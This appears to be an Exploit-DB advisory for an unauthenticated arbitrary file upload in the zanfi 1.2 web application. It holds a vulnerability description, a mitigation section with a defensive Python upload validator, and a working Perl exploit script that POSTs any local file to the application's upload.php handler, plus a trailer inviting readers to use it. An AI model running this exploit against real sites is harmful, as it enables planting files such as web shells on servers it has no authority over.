Vendor: zanfi 1.2
Author: Reptil
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Upload
CWE: 434
Product Name: zanfi 1.2
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

zanfi 1.2 Arbitrary File Upload xpl

This exploit allows an attacker to upload arbitrary files to a vulnerable web application. The zanfi 1.2 web application ships an upload handler at /editor/filemanager/upload/php/upload.php that accepts files without authenticating the caller or restricting the file type, so any client can place a file of its choosing on the web server. The exploit is triggered by sending a multipart POST request to upload.php with the file in the NewFile form field. If the request is accepted, the file is stored on the web server under the application's upload directory.

Mitigation:

The best way to mitigate this vulnerability is to restrict, on the server side, which file types the upload handler accepts: validate the extension against a short allowlist, check that the file contents match the claimed type, and store uploads under a server-generated name rather than the client-supplied one. If the application does not need the uploader, it should be disabled outright, which is the condition the exploit script checks for in the response.
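The checks described above, as an added example that is not part of the original advisory or of the zanfi code: a server-side validator that mirrors what a hardened upload.php should do. The allowlist, magic-byte table and script-extension list are assumptions chosen for an image uploader.

```python
import os
import secrets

# Allowlist of extensions the handler accepts (assumption: the application
# only needs images). Everything not listed is rejected.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes that must match the claimed extension, so a script renamed
# to .jpg is still refused.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Extensions that must never appear anywhere in the name: some server
# configurations execute "name.php.jpg" based on the first extension they
# recognise, and .htaccess can change how a directory is served.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason-or-extension). Only the client-supplied name
    and the file bytes are examined; the Content-Type header is not trusted."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base or base in ("", ".", ".."):
        return False, "invalid filename"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "missing extension"
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:]):
        return False, "script extension present"
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension not allowed: {ext}"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, ext


def stored_name(ext: str) -> str:
    """Never keep the client's name: a random name plus the verified
    extension defeats path tricks and overwrites of existing files."""
    return f"{secrets.token_hex(16)}.{ext}"
```

The same rules belong in the PHP handler itself; the upload directory should additionally be served with script execution disabled.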

Exploit-DB raw data:

#!/usr/bin/perl
# zanfi 1.2 arbitrary file upload (milw0rm, 2008): POSTs a local file to the
# application's unauthenticated upload handler.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+zanfi 1.2 Arbitrary File Upload  xpl               +
+                                                   +
+Discovered by :reptil                              +
+                                                   +
+                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# Reptil  
INTRO

print "Enter URL(ie: http://site.com): ";
chomp(my $url = <STDIN>);

print "Enter File Path(path to local file to upload): ";
chomp(my $file = <STDIN>);

my $ua = LWP::UserAgent->new;
# NewFile must be an array reference so HTTP::Request::Common sends the
# file's contents as a multipart part instead of the path as a plain string.
my $re = $ua->request(POST $url . '/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => [ $file ] ]);
if ($re->is_success) {
    # The handler reports a disabled uploader in its response body.
    if (index($re->content, "Disabled") != -1) { print "File Upload Is Disabled! Failed!\n"; }
    else { print "Exploit Successful! File Uploaded!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;

##############################################################
##############################################################
*
*you can use this and upload files ! 
*
*http://www.site.com/editor/filemanager/upload/test.html
*
*http://www.zanfi.nl
##############################################################
##############################################################

# milw0rm.com [2008-09-10]